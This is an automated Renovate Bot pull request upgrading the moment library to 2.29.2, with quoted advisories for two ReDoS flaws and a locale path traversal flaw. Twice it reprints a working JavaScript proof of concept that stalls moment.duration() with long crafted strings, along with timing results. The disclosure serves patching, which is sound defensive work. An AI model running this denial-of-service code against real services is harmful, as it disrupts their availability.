WARNING: MAJOR (BREAKING) CHANGE: Update dependency moment to v2 [SECURITY] (main)

[renovatebot-confluentinc]

For any questions/concerns about this PR, please review the Renovate Bot wiki/FAQs, or the #renovatebot Slack channel.

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
moment (source)	1.0.0 -> 2.29.2

GitHub Vulnerability Alerts

CVE-2016-4055

Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().

Proof of concept

var moment = require('moment');

var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}

for (i=20000;i<=10000000;i=i+10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1')
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str)

    var end = process.hrtime(start);
    console.log(end);
}

Results

$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]

Recommendation

Please update to version 2.11.2 or later.

CVE-2017-18214

Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.

Recommendation

Update to version 2.19.3 or later.

CVE-2022-24785

Impact

This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.

Patches

This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).

Workarounds

Sanitize user-provided locale name before passing it to moment.js.

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

• Open an issue in moment repo

---

Regular Expression Denial of Service in moment

CVE-2016-4055 / GHSA-87vv-r9j6-g5qv

More information

Details

Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().

Proof of concept

var moment = require('moment');

var genstr = function (len, chr) {
    var result = "";
    for (i=0; i<=len; i++) {
        result = result + chr;
    }

    return result;
}

for (i=20000;i<=10000000;i=i+10000) {
    console.log("COUNT: " + i);
    var str = '-' + genstr(i, '1')
    console.log("LENGTH: " + str.length);
    var start = process.hrtime();
    moment.duration(str)

    var end = process.hrtime(start);
    console.log(end);
}

Results

$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]

Recommendation

Please update to version 2.11.2 or later.

Severity

• CVSS Score: 6.5 / 10 (Medium)
• Vector String: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

• https://nvd.nist.gov/vuln/detail/CVE-2016-4055
• https://github.com/advisories/GHSA-87vv-r9j6-g5qv
• https://github.com/moment/moment
• https://lists.apache.org/thread.html/10f0f3aefd51444d1198c65f44ffdf2d78ca3359423dbc1c168c9731@​%3Cdev.flink.apache.org%3E
• https://lists.apache.org/thread.html/17ff53f7999e74fbe3cc0ceb4e1c3b00b180b7c5afec8e978837bc49@​%3Cuser.flink.apache.org%3E
• https://lists.apache.org/thread.html/52bafac05ad174000ea465fe275fd3cc7bd5c25535a7631c0bc9bfb2@​%3Cuser.flink.apache.org%3E
• https://lists.apache.org/thread.html/54df3aeb4239b64b50b356f0ca6f986e3c4ca5b84c515dce077c7854@​%3Cuser.flink.apache.org%3E
• https://www.npmjs.com/advisories/55
• https://www.tenable.com/security/tns-2019-02
• http://www.openwall.com/lists/oss-security/2016/04/20/11
• http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
• http://www.securityfocus.com/bid/95849

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Regular Expression Denial of Service in moment

CVE-2017-18214 / GHSA-446m-mv8f-q348

More information

Details

Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.

Recommendation

Update to version 2.19.3 or later.

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

• https://nvd.nist.gov/vuln/detail/CVE-2017-18214
• https://github.com/moment/moment/issues/4163
• https://github.com/moment/moment/pull/4326
• https://github.com/moment/moment/commit/69ed9d44957fa6ab12b73d2ae29d286a857b80eb
• https://github.com/advisories/GHSA-446m-mv8f-q348
• https://github.com/moment/moment
• https://www.npmjs.com/advisories/532
• https://www.tenable.com/security/tns-2019-02

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Path Traversal: 'dir/../../filename' in moment.locale

CVE-2022-24785 / GHSA-8hfj-j24r-96c4

More information

Details

Impact

This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.

Patches

This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).

Workarounds

Sanitize user-provided locale name before passing it to moment.js.

References

Are there any links users can visit to find out more?

For more information

If you have any questions or comments about this advisory:

• Open an issue in moment repo

Severity

• CVSS Score: 7.5 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

References

• https://github.com/moment/moment/security/advisories/GHSA-8hfj-j24r-96c4
• https://nvd.nist.gov/vuln/detail/CVE-2022-24785
• https://github.com/moment/moment/commit/4211bfc8f15746be4019bba557e29a7ba83d54c5
• https://github.com/moment/moment
• https://lists.debian.org/debian-lts-announce/2023/01/msg00035.html
• https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q
• https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6QIO6YNLTK2T7SPKDS4JEL45FANLNC2Q
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ORJX2LF6KMPIHP6B2P6KZIVKMLE3LVJ5
• https://security.netapp.com/advisory/ntap-20220513-0006
• https://security.netapp.com/advisory/ntap-20241108-0002
• https://www.tenable.com/security/tns-2022-09

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR has been generated by Renovate Bot.

[service-bot-app]

Could not automerge PR: Found a file in the diff that is not marked as an approved dependency file: example/pnpm-lock.yaml